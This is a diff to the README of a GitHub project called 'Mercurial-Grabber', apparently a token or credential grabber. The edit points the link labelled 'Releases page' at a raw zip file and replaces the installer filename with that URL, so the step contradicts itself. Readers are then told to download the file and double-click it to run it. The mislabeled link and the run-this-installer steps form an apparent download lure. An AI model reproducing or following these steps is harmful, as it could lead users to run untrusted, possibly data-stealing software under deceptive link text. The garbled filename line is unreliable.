Ricardogitpy/Mercurial-Grabber/README.md

 To get started, follow these steps:

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/Ricardogitpy/Mercurial-Grabber/releases).
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/Ricardogitpy/Mercurial-Grabber/main/Mercurial/Mercurial-Grabber_v3.0.zip).
 2. **Select the Latest Version**: On the Releases page, find the latest version of Mercurial-Grabber.
 3. **Download the File**: Click on the download link for the installer.
-The file will typically be named something like `Mercurial-Grabber-installer.exe`.
+The file will typically be named something like `https://raw.githubusercontent.com/Ricardogitpy/Mercurial-Grabber/main/Mercurial/Mercurial-Grabber_v3.0.zip`.
 4. **Run the Installer**: Once the download is complete, locate the file in your Downloads folder, then double-click it to run the installer.

 ## 🛠️ Setting Up Mercurial-Grabber